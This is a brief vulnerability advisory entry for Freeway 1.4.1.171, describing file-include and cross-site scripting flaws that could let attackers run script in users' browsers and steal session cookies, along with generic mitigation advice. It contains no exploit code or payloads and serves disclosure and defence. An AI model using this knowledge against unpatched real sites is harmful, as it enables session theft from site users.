Vendor: Freeway
By: SecurityFocus
CVSS: 7.5 (HIGH)
Multiple Remote/Local File Include and Cross-Site Scripting
CWE: 79, 98
Product Name: Freeway
Affected Version From: Freeway 1.4.1.171
Affected Version To: Other versions may also be vulnerable.
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Freeway Multiple Remote/Local File Include and Cross-Site Scripting Vulnerabilities
Freeway is prone to multiple remote file-include and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Mitigation:
Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be kept up-to-date with the latest security patches.